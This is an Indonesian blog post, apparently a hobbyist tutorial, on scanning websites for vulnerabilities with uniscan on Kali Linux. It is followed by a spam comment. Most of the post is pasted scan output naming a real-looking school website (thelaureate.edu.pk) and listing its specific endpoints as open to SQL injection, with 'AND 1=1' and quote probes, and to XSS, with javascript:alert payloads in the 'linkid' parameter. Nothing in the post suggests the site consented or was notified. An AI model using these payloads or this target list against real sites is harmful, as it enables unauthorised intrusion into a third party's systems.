-->
Home  ›  InformationGathering  ›  KaliLinux

Cara Mencari Celah Website Dengan Uniscan

di 1 comment
Assalamuallaikum wr.wb


udah 7 jam gw pake ini os :D ,  yah ga jauh beda ama ubuntu lama gw, cuma ini toolsnya lebih lengkap *ehcurhat. postingan kali ini gw mau share cara mengetahui celah website misalnya : sqli, xss, kali ini gw pake uniscan. ini sekedar pengetahuan gan & gw bukan hekel. ok langsung saja




[+] uniscan



nah seperti itu penampakannya, lanjut

[+] uniscan http://sempak.com/ -qweds , gw pake perintah defaultnya aja


dan sekian lama menunggu sekitar 2 menit ketemulah anu'nya




| Blind SQL Injection:
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=18+AND+1=1    
| [+] Keyword: Temporarily
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/contents.php?id=10+AND+1=1    
| [+] Keyword: status
| [+] Vul [Blind SQL-i]: http://www.thelaureate.edu.pk/notice-board.php?linkid=8+AND+1=1    
| [+] Keyword: Bokhari
|                                                                                                  
|                                                                                                  
| Local File Include:
|                                                                                                  
|                                                                                                  
| PHP CGI Argument Injection:
|                                                                                                  
|                                                                                                  
| Remote Command Execution:
|                                                                                                  
|                                                                                                  
| Remote File Include:
|                                                                                                  
|                                                                                                  
| SQL Injection:
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=16"              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/contents.php?id=8'              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=8"              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/news-event.php?id=9'              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=13"              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9'              
| [+] Vul [SQL-i] http://www.thelaureate.edu.pk/notice-board.php?linkid=9"              
|                                                                                                  
|                                                                                                  
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">              
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<DIV STYLE="background-image: url(javascript:alert('XSS'))">              
| [+] Vul [XSS] http://www.thelaureate.edu.pk/notice-board.php?linkid=<table background="javascript:alert('XSS')"></table>


sekian postingan dari saya semoga bermanfaat ^_^ ~
InformationGathering KaliLinux

Related Posts

1 comment

  1. UnknownApril 25, 2016 at 6:44 AM

    Perkenalkan, saya dari tim kumpulbagi. Saya ingin tau, apakah kiranya anda berencana untuk mengoleksi files menggunakan hosting yang baru?
    Jika ya, silahkan kunjungi website ini www.kumpulbagi.com untuk info selengkapnya.

    Di sana anda bisa dengan bebas share dan mendowload foto-foto keluarga dan trip, music, video, filem dll dalam jumlah dan waktu yang tidak terbatas, setelah registrasi terlebih dahulu. Gratis :)

    ReplyDelete

Post a Comment

Subscribe Our Newsletter